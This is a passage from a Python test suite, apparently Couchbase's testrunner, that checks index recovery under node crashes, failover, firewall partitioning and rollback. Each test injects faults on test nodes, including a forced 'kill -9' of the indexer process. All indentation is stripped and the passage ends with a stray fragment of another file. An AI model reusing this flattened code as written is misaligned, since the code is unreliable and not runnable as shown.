self.assertTrue(stopped, msg="Unable to stop rebalance")
rebalance.result()
self.sleep(100)
rebalance = self.cluster.async_rebalance(
self.servers[:self.nodes_init], self.nodes_in_list,
self.nodes_out_list, services=self.services_in)
mid_recovery_tasks = self.async_run_operations(phase="in_between")
rebalance.result()
self._run_tasks([kvOps_tasks, mid_recovery_tasks])
# check if the nodes in cluster are healthy
msg = "Cluster not in Healthy state"
self.assertTrue(self.wait_until_cluster_is_healthy(), msg)
log.info("==== Cluster in healthy state ====")
self._check_all_bucket_items_indexed()
post_recovery_tasks = self.async_run_operations(phase="after")
self._run_tasks([post_recovery_tasks])
except Exception as ex:
log.info(str(ex))
raise
def test_server_crash(self):
pre_recovery_tasks = self.async_run_operations(phase="before")
self._run_tasks([pre_recovery_tasks])
self.get_dgm_for_plasma()
kvOps_tasks = self._run_kvops_tasks()
try:
self.use_replica = False
self._create_replica_indexes()
self.targetProcess = self.input.param("targetProcess", 'memcached')
for node in self.nodes_out_list:
remote = RemoteMachineShellConnection(node)
if self.targetProcess == "memcached":
remote.kill_memcached()
else:
remote.terminate_process(process_name=self.targetProcess)
self.sleep(60)
mid_recovery_tasks = self.async_run_operations(phase="in_between")
self._run_tasks([kvOps_tasks, mid_recovery_tasks])
# check if the nodes in cluster are healthy
msg = "Cluster not in Healthy state"
self.assertTrue(self.wait_until_cluster_is_healthy(), msg)
log.info("==== Cluster in healthy state ====")
self._check_all_bucket_items_indexed()
post_recovery_tasks = self.async_run_operations(phase="after")
self._run_tasks([post_recovery_tasks])
except Exception as ex:
log.info(str(ex))
raise
def test_server_stop(self):
if self.doc_ops:
return
pre_recovery_tasks = self.async_run_operations(phase="before")
self._run_tasks([pre_recovery_tasks])
self.get_dgm_for_plasma()
kvOps_tasks = self._run_kvops_tasks()
try:
self._create_replica_indexes()
for node in self.nodes_out_list:
remote = RemoteMachineShellConnection(node)
remote.stop_server()
mid_recovery_tasks = self.async_run_operations(phase="in_between")
self._run_tasks([kvOps_tasks, mid_recovery_tasks])
post_recovery_tasks = self.async_run_operations(phase="after")
self._run_tasks([post_recovery_tasks])
except Exception as ex:
log.info(str(ex))
raise
finally:
for node in self.nodes_out_list:
remote = RemoteMachineShellConnection(node)
remote.start_server()
self.sleep(20)
def test_server_restart(self):
pre_recovery_tasks = self.async_run_operations(phase="before")
self._run_tasks([pre_recovery_tasks])
self.get_dgm_for_plasma()
kvOps_tasks = self._run_kvops_tasks()
try:
for node in self.nodes_out_list:
remote = RemoteMachineShellConnection(node)
remote.stop_server()
self.sleep(30)
for node in self.nodes_out_list:
remote = RemoteMachineShellConnection(node)
remote.start_server()
self.sleep(30)
mid_recovery_tasks = self.async_run_operations(phase="in_between")
self._run_tasks([kvOps_tasks, mid_recovery_tasks])
# check if the nodes in cluster are healthy
msg = "Cluster not in Healthy state"
self.assertTrue(self.wait_until_cluster_is_healthy(), msg)
log.info("==== Cluster in healthy state ====")
self._check_all_bucket_items_indexed()
post_recovery_tasks = self.async_run_operations(phase="after")
self._run_tasks([post_recovery_tasks])
except Exception as ex:
log.info(str(ex))
raise
def test_failover(self):
pre_recovery_tasks = self.async_run_operations(phase="before")
self._run_tasks([pre_recovery_tasks])
self.get_dgm_for_plasma()
kvOps_tasks = self._run_kvops_tasks()
try:
self._create_replica_indexes()
servr_out = self.nodes_out_list
failover_task = self.cluster.async_failover(
[self.master],
failover_nodes=servr_out,
graceful=self.graceful)
mid_recovery_tasks = self.async_run_operations(phase="in_between")
failover_task.result()
if self.graceful:
# Check if rebalance is still running
msg = "graceful failover failed for nodes"
check_rblnc = RestConnection(self.master).monitorRebalance(
stop_if_loop=True)
self.assertTrue(check_rblnc, msg=msg)
self._run_tasks([kvOps_tasks, mid_recovery_tasks])
rebalance = self.cluster.async_rebalance(
self.servers[:self.nodes_init], [], servr_out)
rebalance.result()
# check if the nodes in cluster are healthy
msg = "Cluster not in Healthy state"
self.assertTrue(self.wait_until_cluster_is_healthy(), msg)
log.info("==== Cluster in healthy state ====")
self._check_all_bucket_items_indexed()
post_recovery_tasks = self.async_run_operations(phase="after")
self._run_tasks([post_recovery_tasks])
except Exception as ex:
log.info(str(ex))
raise
def test_failover_add_back(self):
try:
rest = RestConnection(self.master)
recoveryType = self.input.param("recoveryType", "full")
servr_out = self.nodes_out_list
failover_task = self.cluster.async_failover([self.master],
failover_nodes=servr_out, graceful=self.graceful)
failover_task.result()
pre_recovery_tasks = self.async_run_operations(phase="before")
self._run_tasks([pre_recovery_tasks])
self.get_dgm_for_plasma()
kvOps_tasks = self._run_kvops_tasks()
nodes_all = rest.node_statuses()
nodes = []
if servr_out[0].ip == "127.0.0.1":
for failover_node in servr_out:
nodes.extend([node for node in nodes_all
if (str(node.port) == failover_node.port)])
else:
for failover_node in servr_out:
nodes.extend([node for node in nodes_all
if node.ip == failover_node.ip])
for node in nodes:
log.info("Adding Back: {0}".format(node))
rest.add_back_node(node.id)
rest.set_recovery_type(otpNode=node.id,
recoveryType=recoveryType)
rebalance = self.cluster.async_rebalance(
self.servers[:self.nodes_init], [], [])
mid_recovery_tasks = self.async_run_operations(phase="in_between")
rebalance.result()
self._run_tasks([kvOps_tasks, mid_recovery_tasks])
# check if the nodes in cluster are healthy
msg = "Cluster not in Healthy state"
self.assertTrue(self.wait_until_cluster_is_healthy(), msg)
log.info("==== Cluster in healthy state ====")
self._check_all_bucket_items_indexed()
post_recovery_tasks = self.async_run_operations(phase="after")
self._run_tasks([post_recovery_tasks])
except Exception as ex:
log.info(str(ex))
raise
def test_failover_indexer_add_back(self):
"""
Indexer add back scenarios
:return:
"""
rest = RestConnection(self.master)
recoveryType = self.input.param("recoveryType", "full")
indexer_out = int(self.input.param("nodes_out", 0))
nodes = self.get_nodes_from_services_map(service_type="index",
get_all_nodes=True)
self.assertGreaterEqual(len(nodes), indexer_out,
"Existing Indexer Nodes less than Indexer out nodes")
pre_recovery_tasks = self.async_run_operations(phase="before")
self._run_tasks([pre_recovery_tasks])
self.get_dgm_for_plasma()
kvOps_tasks = self._run_kvops_tasks()
try:
self.use_replica = False
self._create_replica_indexes()
servr_out = nodes[:indexer_out]
failover_task = self.cluster.async_failover(
[self.master], failover_nodes=servr_out,
graceful=self.graceful)
failover_task.result()
nodes_all = rest.node_statuses()
nodes = []
if servr_out[0].ip == "127.0.0.1":
for failover_node in servr_out:
nodes.extend([node for node in nodes_all
if (str(node.port) == failover_node.port)])
else:
for failover_node in servr_out:
nodes.extend([node for node in nodes_all
if node.ip == failover_node.ip])
for node in nodes:
log.info("Adding back {0} with recovery type {1}...".format(
node.ip, recoveryType))
rest.add_back_node(node.id)
rest.set_recovery_type(otpNode=node.id,
recoveryType=recoveryType)
log.info("Rebalancing nodes in...")
mid_recovery_tasks = self.async_run_operations(phase="in_between")
rebalance = self.cluster.async_rebalance(
self.servers[:self.nodes_init], [], [])
rebalance.result()
self._run_tasks([mid_recovery_tasks, kvOps_tasks])
# check if the nodes in cluster are healthy
msg = "Cluster not in Healthy state"
self.assertTrue(self.wait_until_cluster_is_healthy(), msg)
log.info("==== Cluster in healthy state ====")
self._check_all_bucket_items_indexed()
post_recovery_tasks = self.async_run_operations(phase="after")
self._run_tasks([post_recovery_tasks])
except Exception as ex:
log.info(str(ex))
raise
def test_failover_indexer_restart(self):
"""
CBQE-3153
Indexer add back scenarios
:return:
"""
index_servers = self.get_nodes_from_services_map(service_type="index",
get_all_nodes=True)
self.multi_create_index(self.buckets, self.query_definitions)
self.get_dgm_for_plasma()
self.sleep(30)
kvOps_tasks = self._run_kvops_tasks()
remote = RemoteMachineShellConnection(index_servers[0])
remote.stop_server()
self.sleep(20)
for bucket in self.buckets:
for query in self.query_definitions:
try:
self.query_using_index(bucket=bucket,
query_definition=query)
except Exception as ex:
msg = "queryport.indexNotFound"
if msg in str(ex):
continue
else:
log.info(str(ex))
break
remote.start_server()
self.sleep(20)
self._run_tasks([kvOps_tasks])
def test_autofailover(self):
pre_recovery_tasks = self.async_run_operations(phase="before")
self._run_tasks([pre_recovery_tasks])
self.get_dgm_for_plasma()
kvOps_tasks = self._run_kvops_tasks()
autofailover_timeout = 30
conn = RestConnection(self.master)
status = conn.update_autofailover_settings(True, autofailover_timeout)
self.assertTrue(status, 'failed to change autofailover_settings!')
try:
self._create_replica_indexes()
servr_out = self.nodes_out_list
remote = RemoteMachineShellConnection(servr_out[0])
remote.stop_server()
self.sleep(10)
mid_recovery_tasks = self.async_run_operations(phase="in_between")
self.sleep(autofailover_timeout + 10, "Wait for autofailover")
rebalance = self.cluster.async_rebalance(
self.servers[:self.nodes_init], [], servr_out)
rebalance.result()
self._run_tasks([kvOps_tasks, mid_recovery_tasks])
# check if the nodes in cluster are healthy
msg = "Cluster not in Healthy state"
self.assertTrue(self.wait_until_cluster_is_healthy(), msg)
log.info("==== Cluster in healthy state ====")
self._check_all_bucket_items_indexed()
post_recovery_tasks = self.async_run_operations(phase="after")
self._run_tasks([post_recovery_tasks])
except Exception as ex:
log.info(str(ex))
raise
finally:
remote.start_server()
self.sleep(30)
def test_network_partitioning(self):
pre_recovery_tasks = self.async_run_operations(phase="before")
self._run_tasks([pre_recovery_tasks])
self.get_dgm_for_plasma()
kvOps_tasks = self._run_kvops_tasks()
try:
self._create_replica_indexes()
for node in self.nodes_out_list:
self.start_firewall_on_node(node)
self.sleep(60)
mid_recovery_tasks = self.async_run_operations(phase="in_between")
self._run_tasks([kvOps_tasks, mid_recovery_tasks])
post_recovery_tasks = self.async_run_operations(phase="after")
self._run_tasks([post_recovery_tasks])
except Exception as ex:
log.info(str(ex))
raise
finally:
for node in self.nodes_out_list:
self.stop_firewall_on_node(node)
self.sleep(30)
# check if the nodes in cluster are healthy
msg = "Cluster not in Healthy state"
self.assertTrue(self.wait_until_cluster_is_healthy(), msg)
log.info("==== Cluster in healthy state ====")
self._check_all_bucket_items_indexed()
def test_couchbase_bucket_compaction(self):
"""
Run Compaction Here
Run auto-compaction to remove the tomb stones
"""
pre_recovery_tasks = self.async_run_operations(phase="before")
self._run_tasks([pre_recovery_tasks])
self.get_dgm_for_plasma()
kvOps_tasks = self._run_kvops_tasks()
compact_tasks = []
for bucket in self.buckets:
compact_tasks.append(self.cluster.async_compact_bucket(
self.master, bucket))
mid_recovery_tasks = self.async_run_operations(phase="in_between")
self._run_tasks([kvOps_tasks, mid_recovery_tasks])
for task in compact_tasks:
task.result()
self._check_all_bucket_items_indexed()
post_recovery_tasks = self.async_run_operations(phase="after")
self._run_tasks([post_recovery_tasks])
def test_warmup(self):
pre_recovery_tasks = self.async_run_operations(phase="before")
self._run_tasks([pre_recovery_tasks])
self.get_dgm_for_plasma()
kvOps_tasks = self._run_kvops_tasks()
for server in self.nodes_out_list:
remote = RemoteMachineShellConnection(server)
remote.stop_server()
remote.start_server()
remote.disconnect()
mid_recovery_tasks = self.async_run_operations(phase="in_between")
ClusterOperationHelper.wait_for_ns_servers_or_assert(self.servers, self)
self._run_tasks([kvOps_tasks, mid_recovery_tasks])
# check if the nodes in cluster are healthy
msg = "Cluster not in Healthy state"
self.assertTrue(self.wait_until_cluster_is_healthy(), msg)
log.info("==== Cluster in healthy state ====")
self._check_all_bucket_items_indexed()
post_recovery_tasks = self.async_run_operations(phase="after")
self._run_tasks([post_recovery_tasks])
def test_couchbase_bucket_flush(self):
pre_recovery_tasks = self.async_run_operations(phase="before")
self._run_tasks([pre_recovery_tasks])
self.get_dgm_for_plasma()
kvOps_tasks = self._run_kvops_tasks()
# Flush the bucket
for bucket in self.buckets:
log.info("Flushing bucket {0}...".format(bucket.name))
rest = RestConnection(self.master)
rest.flush_bucket(bucket.name)
count = 0
while rest.get_bucket_status(bucket.name) != "healthy" and \
count < 10:
log.info("Bucket {0} Status is {1}. Sleeping...".format(
bucket.name, rest.get_bucket_status(bucket.name)))
count += 1
self.sleep(10)
log.info("Bucket {0} is {1}".format(
bucket.name, rest.get_bucket_status(bucket.name)))
mid_recovery_tasks = self.async_run_operations(phase="in_between")
self._run_tasks([kvOps_tasks, mid_recovery_tasks])
# check if the nodes in cluster are healthy
msg = "Cluster not in Healthy state"
self.assertTrue(self.wait_until_cluster_is_healthy(), msg)
log.info("==== Cluster in healthy state ====")
self.sleep(180)
self._check_all_bucket_items_indexed()
post_recovery_tasks = self.async_run_operations(phase="after")
self.sleep(180)
self._run_tasks([post_recovery_tasks])
def test_robust_rollback_handling_in_failure_scenario(self):
"""
MB-36582
TODO:
"https://issues.couchbase.com/browse/MB-37586
https://issues.couchbase.com/browse/MB-37588
Will wait on the stats to be available
https://issues.couchbase.com/browse/MB-37594
"""
data_nodes = self.get_kv_nodes()
self.assertTrue(len(data_nodes) >= 3, "Can't run this with less than 3 KV nodes")
bucket_name = self.buckets[0].name
index_name = self.get_index_map()[bucket_name].keys()[0]
index_node = self.get_nodes_from_services_map(service_type="index",
get_all_nodes=False)
rest = RestConnection(index_node)
# Change indexer snapshot for a recovery point
doc = {"indexer.settings.persisted_snapshot.moi.interval": 60000}
rest.set_index_settings(doc)
# Deleting bucket as there is no easy way in testrunner to crate index before loading data
for bucket in self.buckets:
self.cluster.bucket_delete(self.master, bucket=bucket)
# Create default bucket
default_params = self._create_bucket_params(
server=self.master, size=self.bucket_size,
replicas=self.num_replicas, bucket_type=self.bucket_type,
enable_replica_index=self.enable_replica_index,
eviction_policy=self.eviction_policy, lww=self.lww,
maxttl=self.maxttl, compression_mode=self.compression_mode)
self.cluster.create_default_bucket(default_params)
# loading data to bucket
gens_load = self.generate_docs(num_items=self.docs_per_day)
self.load(gens_load, flag=self.item_flag, batch_size=self.batch_size, op_type="create", verify_data=False)
# creating Index
query_definition = QueryDefinition(index_name=index_name, index_fields=["VMs"],
query_template="SELECT * FROM %s ", groups=["simple"],
index_where_clause=" VMs IS NOT NULL ")
self.load_query_definitions.append(query_definition)
self.create_index(bucket="default", query_definition=query_definition)
node_b, node_c = (None, None)
for node in data_nodes:
if node.ip == self.master.ip:
continue
if not node_b:
node_b = node
else:
node_c = node
break
# Blocking Node C from Node B
try:
self.block_incoming_network_from_node(node_b, node_c)
# Killing Memcached on Node C so that disk snapshots have vbuuid not available with Node B
for _ in range(2):
# Killing memcached on node C
num_snapshot = rest.get_index_stats()[bucket_name][index_name]["num_commits"]
remote_client = RemoteMachineShellConnection(node_c)
remote_client.kill_memcached()
remote_client.disconnect()
sleep_count = 0
while sleep_count < 10:
self.sleep(10, "Waiting for Disk Snapshot/s to be available")
new_num_snapshot = rest.get_index_stats()[bucket_name][index_name]["num_commits"]
if new_num_snapshot > num_snapshot:
self.log.info("New Disk Snapshot is available")
break
sleep_count += 1
# Restarting Indexer to clear in-memory snapshots
remote_client = RemoteMachineShellConnection(index_node)
remote_client.execute_command("kill -9 $(ps aux | pgrep 'indexer')")
self.sleep(timeout=10, message="Allowing time for indexer to restart")
# Fail over Node C so that replica takes over on Node B
self.cluster.failover(servers=self.servers, failover_nodes=[node_c])
self.sleep(timeout=30, message="Waiting for rollback to kick in")
# Get rollback count
num_rollback = rest.get_num_rollback_stat(bucket="default")
self.assertEqual(num_rollback, 1, "Failed to rollback in failure scenario")
# Todo: add validation that the rollback has happened from snapshot not from Zero
finally:
self.resume_blocked_incoming_network_from_node(node_b, node_c)
def test_discard_disk_snapshot_after_kv_persisted(self):
"""
MB-36554
Todo: https://issues.couchbase.com/browse/MB-37586
Will wait on the stats to be available
https://issues.couchbase.com/browse/MB-37587
"""
data_nodes = self.get_kv_nodes()
self.assertTrue(len(data_nodes) == 2, "This test require a cluster of 2 nodes")
bucket_name = self.buckets[0].name
index_name = list(self.get_index_map()[bucket_name])[0]
index_node = self.get_nodes_from_services_map(service_type="index",
get_all_nodes=False)
rest = RestConnection(index_node)
# Change indexer snapshot for a recovery point
doc = {"indexer.settings.persisted_snapshot.moi.interval": 60000}
rest.set_index_settings(doc)
# Deleting bucket as there is no easy way in testrunner to crate index before loading data
for bucket in self.buckets:
self.cluster.bucket_delete(self.master, bucket=bucket)
# Create default bucket
default_params = self._create_bucket_params(
server=self.master, size=self.bucket_size,
replicas=self.num_replicas, bucket_type=self.bucket_type,
enable_replica_index=self.enable_replica_index,
eviction_policy=self.eviction_policy, lww=self.lww,
maxttl=self.maxttl, compression_mode=self.compression_mode)
self.cluster.create_default_bucket(default_params)
# loading data to bucket
gens_load = self.generate_docs(num_items=self.docs_per_day)
self.load(gens_load, flag=self.item_flag, batch_size=self.batch_size, op_type="create", verify_data=False)
# creating Index
query_definition = QueryDefinition(index_name=index_name, index_fields=["VMs"],
query_template="SELECT * FROM %s ", groups=["simple"],
index_where_clause=" VMs IS NOT NULL ")
self.load_query_definitions.append(query_definition)
self.create_index(bucket="default", query_definition=query_definition)
# Blocking node B firewall
node_b, node_c = data_nodes
try:
self.block_incoming_network_from_node(node_b, node_c)
# Performing doc mutation
num_snapshot = rest.get_index_stats()[bucket_name][index_name]["num_commits"]
gens_load = self.generate_docs(self.docs_per_day * 2)
self.load(gens_load, flag=self.item_flag, verify_data=False, batch_size=self.batch_size)
sleep_count = 0
while sleep_count < 10:
self.sleep(10, "Waiting for Disk Snapshot/s to be available")
new_num_snapshot = rest.get_index_stats()[bucket_name][index_name]["num_commits"]
if new_num_snapshot > num_snapshot:
self.log.info("New Disk Snapshot is available")
break
sleep_count += 1
# Performing doc mutation
num_snapshot = rest.get_index_stats()[bucket_name][index_name]["num_commits"]
gens_load = self.generate_docs(self.docs_per_day * 3)
self.load(gens_load, flag=self.item_flag, verify_data=False, batch_size=self.batch_size)
sleep_count = 0
while sleep_count < 10:
self.sleep(10, "Waiting for Disk Snapshot/s to be available")
new_num_snapshot = rest.get_index_stats()[bucket_name][index_name]["num_commits"]
if new_num_snapshot > num_snapshot:
self.log.info("New Disk Snapshot is available")
break
sleep_count += 1
# resume the communication between node B and node C
finally:
self.resume_blocked_incoming_network_from_node(node_b, node_c)
# TODO: Need to add validation based on stat that the Disk Snapshot has catch up and extra snapshots are deleted
# Meanwhile we will validate based on the item_count
self.sleep(timeout=2 * 60, message="Giving some time to indexer to recover after resuming communication "
"between node A and node B")
item_count_after_checking_kv_persisted_seq_num = rest.get_index_stats()[bucket_name][index_name]["items_count"]
self.assertEqual(item_count_after_checking_kv_persisted_seq_num, self.docs_per_day * 3 * 2016,
"Indexer failed to index all the items in bucket.\nExpected indexed item {}"
"\n Actual indexed item {}".format(item_count_after_checking_kv_persisted_seq_num,
self.docs_per_day * 3 * 2016))
def test_rollback_to_zero_preceded_by_rollback_from_disk_snapshot(self):
"""
MB36444
"""
bucket_name = self.buckets[0].name
index_name = list(self.get_index_map()[bucket_name])[0]
data_nodes = self.get_kv_nodes()
self.assertTrue(len(data_nodes) >= 3, "Can't run this with less than 3 KV nodes")
# Blocking node B firewall
node_b, node_c = (None, None)
for node in data_nodes:
if node.ip == self.master.ip:
continue
if not node_b:
node_b = node
else:
node_c = node
break
try:
# Blocking communication between Node B and Node C
conn = RestConnection(self.master)
self.block_incoming_network_from_node(node_b, node_c)
# Doing some mutation which replica on Node C won't see
gens_load = self.generate_docs(num_items=self.docs_per_day * 2)
self.load(gens_load, flag=self.item_flag, batch_size=self.batch_size, op_type="create", verify_data=False)
# Failing over Node C
self.cluster.failover(servers=self.servers, failover_nodes=[node_c])
sleep_count = 0
while sleep_count < 15:
num_rollback = conn.get_num_rollback_stat(bucket=bucket_name)
if num_rollback == 1:
self.log.info("Indexer has rolled back from disk snapshot")
break
self.sleep(10, "Waiting for rollback to disk snapshot")
sleep_count += 1
self.assertNotEqual(sleep_count, 15, "Rollback to disk snapshot didn't happen")
# Change indexer snapshot for a recovery point
doc = {"indexer.settings.persisted_snapshot.moi.interval": 60000}
conn.set_index_settings(doc)
# Doing some mutation so that two new disk snapshots are generated
num_snapshot = conn.get_index_stats()[bucket_name][index_name]["num_commits"]
gens_load = self.generate_docs(num_items=self.docs_per_day * 3)
self.load(gens_load, flag=self.item_flag, batch_size=self.batch_size, op_type="create", verify_data=False)
sleep_count = 0
while sleep_count < 10:
self.sleep(10, "Waiting for Disk Snapshot/s to be available")
new_num_snapshot = conn.get_index_stats()[bucket_name][index_name]["num_commits"]
if new_num_snapshot > num_snapshot:
self.log.info("New Disk Snapshot is available")
break
sleep_count += 1
self.assertNotEqual(sleep_count, 10, "No new Disk Snapshot is available")
num_snapshot = conn.get_index_stats()[bucket_name][index_name]["num_commits"]
gens_load = self.generate_docs(num_items=self.docs_per_day * 4)
self.load(gens_load, flag=self.item_flag, batch_size=self.batch_size, op_type="create", verify_data=False)
sleep_count = 0
while sleep_count < 10:
self.sleep(10, "Waiting for Disk Snapshot/s to be available")
new_num_snapshot = conn.get_index_stats()[bucket_name][index_name]["num_commits"]
if new_num_snapshot > num_snapshot:
self.log.info("New Disk Snapshot is available")
break
sleep_count += 1
self.assertNotEqual(sleep_count, 10, "No new Disk Snapshot is available")
# Performing full recovery for fail over Node C
self.resume_blocked_incoming_network_from_node(node_b, node_c)
conn.set_recovery_type(otpNode='ns_1@' + node_c.ip, recoveryType="full")
self.cluster.rebalance(self.servers, [], [])
# Blocking communication between Node B and Node C
conn = RestConnection(self.master)
self.block_incoming_network_from_node(node_b, node_c)
# Doing some mutation which replica on Node C won't see
gens_load = self.generate_docs(num_items=self.docs_per_day * 5)
self.load(gens_load, flag=self.item_flag, batch_size=self.batch_size, op_type="create", verify_data=False)
# Killing memcached on node C
remote_client = RemoteMachineShellConnection(node_c)
remote_client.kill_memcached()
remote_client.disconnect()
# Failing over Node C
num_rollback = conn.get_num_rollback_stat(bucket=bucket_name)
self.cluster.failover(servers=self.servers, failover_nodes=[node_c])
sleep_count = 0
while sleep_count < 10:
self.sleep(10, "Waiting for Disk Snapshot/s to be available")
new_num_rollback = conn.get_num_rollback_stat(bucket=bucket_name)
if new_num_rollback == num_rollback + 1:
self.log.info("Rollbacked to Disk Snapshot")
break
sleep_count += 1
self.assertNotEqual(sleep_count, 10, "Indexer failed to rollback")
# Todo: add the assert to check the rollback happened from disk snapshot not from zero
finally:
self.resume_blocked_incoming_network_from_node(node_b, node_c)
def test_restart_timestamp_calculation_for_rollback(self):
"""
MB-35880
Case B:
Can't reproduce it consistently
"""
data_nodes = self.get_kv_nodes()
self.assertTrue(len(data_nodes) >= 3, "Can't run this with less than 3 KV nodes")
# Deleting bucket as there is no easy way in testrunner to crate index before loading data
for bucket in self.buckets:
self.cluster.bucket_delete(self.master, bucket=bucket)
# Create default bucket
default_params = self._create_bucket_params(
server=self.master, size=self.bucket_size,
replicas=self.num_replicas, bucket_type=self.bucket_type,
enable_replica_index=self.enable_replica_index,
eviction_policy=self.eviction_policy, lww=self.lww,
maxttl=self.maxttl, compression_mode=self.compression_mode)
self.cluster.create_default_bucket(default_params)
# creating Index idx_0
query_definition = QueryDefinition(index_name="idx_0", index_fields=["VMs"], query_template="SELECT * FROM %s ",
groups=["simple"], index_where_clause=" VMs IS NOT NULL ")
self.load_query_definitions.append(query_definition)
self.create_index(bucket="default", query_definition=query_definition)
# loading data to bucket
gens_load = self.generate_docs(num_items=self.docs_per_day)
self.load(gens_load, flag=self.item_flag, batch_size=self.batch_size, op_type="create", verify_data=False)
# creating few more indexes
for item in range(1, 4):
query_definition = QueryDefinition(index_name="idx_{0}".format(item), index_fields=["VMs"],
query_template="SELECT * FROM %s ", groups=["simple"],
index_where_clause=" VMs IS NOT NULL ")
self.load_query_definitions.append(query_definition)
self.create_index(bucket="default", query_definition=query_definition)
# Checking item_count in all indexes
self.sleep(timeout=10, message="Allowing indexes to index all item in bucket")
rest = RestConnection(self.master)
for item in range(4):
indexed_item = rest.get_index_stats()["default"]["idx_{0}".format(item)]["items_count"]
self.assertEqual(indexed_item, self.docs_per_day * 2016, "Failed to index all the item in bucket")
data_nodes = self.get_kv_nodes()
node_b, node_c = (None, None)
for node in data_nodes:
if node.ip == self.master.ip:
continue
if not node_b:
node_b = node
else:
node_c = node
break
try:
# Blocking communication between Node B and Node C
self.block_incoming_network_from_node(node_b, node_c)
# Mutating docs so that replica on Node C don't see changes on Node B
gens_load = self.generate_docs(num_items=self.docs_per_day)
self.load(gens_load, flag=self.item_flag, batch_size=self.batch_size, op_type="create", verify_data=False)
# killing Memcached on Node B
remote_client = RemoteMachineShellConnection(node_b)
remote_client.kill_memcached()
remote_client.disconnect()
# Failing over Node B
self.cluster.failover(servers=self.servers, failover_nodes=[node_b])
self.sleep(timeout=10, message="Allowing indexer to rollback")
# Validating that indexer has indexed item after rollback and catch up with items in bucket
for item in range(4):
indexed_item = rest.get_index_stats()["default"]["idx_{0}".format(item)]["items_count"]
self.assertEqual(indexed_item, self.docs_per_day * 2016, "Index {} has failed to index items after"
" rollback")
finally:
self.resume_blocked_incoming_network_from_node(node_b, node_c)
def test_recover_index_from_in_memory_snapshot(self):
"""
MB-32102
MB-35663
"""
bucket_name = self.buckets[0].name
index_name = list(self.get_index_map()[bucket_name])[0]
# Blocking node B firewall
data_nodes = self.get_kv_nodes()
self.assertTrue(len(data_nodes) >= 3, "Can't run this with less than 3 KV nodes")
node_b, node_c = (None, None)
for node in data_nodes:
if node.ip == self.master.ip:
continue
if not node_b:
node_b = node
else:
node_c = node
break
# get num_rollback stats before triggering in-memory recovery
conn = RestConnection(self.master)
num_rollback_before_recovery = conn.get_num_rollback_stat(bucket=bucket_name)
try:
self.block_incoming_network_from_node(node_b, node_c)
# killing Memcached on Node B
remote_client = RemoteMachineShellConnection(node_b)
remote_client.kill_memcached()
remote_client.disconnect()
# Failing over Node B
self.cluster.failover(servers=self.servers, failover_nodes=[node_b])
finally:
# resume the communication between node B and node C
self.resume_blocked_incoming_network_from_node(node_b, node_c)
# get num_rollback stats after in-memory recovery of indexes
num_rollback_after_recovery = conn.get_num_rollback_stat(bucket=bucket_name)
self.assertEqual(num_rollback_before_recovery, num_rollback_after_recovery,
"Recovery didn't happen from in-memory snapshot")
self.log.info("Node has recovered from in-memory snapshots")
# Loading few more docs so that indexer will index updated as well as new docs
gens_load = self.generate_docs(num_items=self.docs_per_day * 2)
self.load(gens_load, flag=self.item_flag, batch_size=self.batch_size, op_type="create", verify_data=False)
use_index_query = "select Count(*) from {0} USE INDEX ({1})".format(bucket_name, index_name)
result = self.n1ql_helper.run_cbq_query(query=use_index_query, server=self.n1ql_node,
scan_consistency=CONSISTENCY_REQUEST)["results"][0]["$1"]
expected_result = self.docs_per_day * 2 * 2016
self.assertEqual(result, expected_result, "Indexer hasn't recovered properly from in-memory as"
" indexes haven't catch up with "
"request_plus/consistency_request")
self.log.info("Indexer continues to index as expected")
def test_partial_rollback(self):
self.multi_create_index()
self.sleep(30)
self.log.info("Stopping persistence on NodeA & NodeB")
data_nodes = self.get_nodes_from_services_map(service_type="kv",
get_all_nodes=True)
for data_node in data_nodes:
for bucket in self.buckets:
mem_client = MemcachedClientHelper.direct_client(data_node, bucket.name)
mem_client.stop_persistence()
self.run_doc_ops()
self.sleep(10)
# Get count before rollback
bucket_before_item_counts = {}
for bucket in self.buckets:
bucket_count_before_rollback = self.get_item_count(self.master, bucket.name)
bucket_before_item_counts[bucket.name] = bucket_count_before_rollback
log.info("Items in bucket {0} before rollback = {1}".format(
bucket.name, bucket_count_before_rollback))
# Index rollback count before rollback
self._verify_bucket_count_with_index_count()
self.multi_query_using_index()
# Kill memcached on Node A so that Node B becomes master
self.log.info("Kill Memcached process on NodeA")
shell = RemoteMachineShellConnection(data_nodes[0])
shell.kill_memcached()
# Start persistence on Node B
self.log.info("Starting persistence on NodeB")
for bucket in self.buckets:
mem_client = MemcachedClientHelper.direct_client(data_nodes[1], bucket.name)
mem_client.start_persistence()
# Failover Node B
self.log.info("Failing over NodeB")
self.sleep(10)
failover_task = self.cluster.async_failover(
self.servers[:self.nodes_init], [data_nodes[1]], self.graceful,
wait_for_pending=120)
failover_task.result()
# Wait for a couple of mins to allow rollback to complete
# self.sleep(120)
bucket_after_item_counts = {}
for bucket in self.buckets:
bucket_count_after_rollback = self.get_item_count(self.master, bucket.name)
bucket_after_item_counts[bucket.name] = bucket_count_after_rollback
log.info("Items in bucket {0} after rollback = {1}".format(
bucket.name, bucket_count_after_rollback))
for bucket in self.buckets:
if bucket_after_item_counts[bucket.name] == bucket_before_item_counts[bucket.name]:
log.info("Looks like KV rollback did not happen at all.")
self._verify_bucket_count_with_index_count()
self.multi_query_using_index()
def _create_replica_indexes(self):
query_definitions = []
if not self.use_replica:
return []
if not self.index_nodes_out:
return []
index_nodes = self.get_nodes_from_services_map(service_type="index",
get_all_nodes=True)
for node in self.index_nodes_out:
if node in index_nodes:
index_nodes.remove(node)
if index_nodes:
ops_map = self.generate_operation_map("in_between")
if ("create_index" not in ops_map):
indexes_lost = self._find_index_lost_when_indexer_down()
deploy_node_info = ["{0}:{1}".format(index_nodes[0].ip,
index_nodes[0].port)]
for query_definition in self.query_definitions:
if query_definition.index_name in indexes_lost:
query_definition.index_name = query_definition.index_name + "_replica"
query_definitions.append(query_definition)
for bucket in self.buckets:
self.create_index(bucket=bucket,
query_definition=query_definition,
deploy_node_info=deploy_node_info)
else:
query_definitions.append(query_definition)
self.query_definitions = query_definitions
def _find_index_lost_when_indexer_down(self):
lost_indexes = []
rest = RestConnection(self.master)
index_map = rest.get_index_status()
log.info("index_map: {0}".format(index_map))
for index_node in self.index_nodes_out:
host = "{0}:8091".format(index_node.ip)
for index in index_map.values():
for keys, vals in index.items():
if vals["hosts"] == host:
lost_indexes.append(keys)
log.info("Lost Indexes: {0}".format(lost_indexes))
return lost_indexes
def _run_kvops_tasks(self):
tasks_ops = []
if self.doc_ops:
tasks_ops = self.async_run_doc_ops()
return tasks_ops
def _run_tasks(self, tasks_list):
for tasks in tasks_list:
for task in tasks:
task.result()
|
tasks.py
|
import os
import threading
from invoke import run, task, util
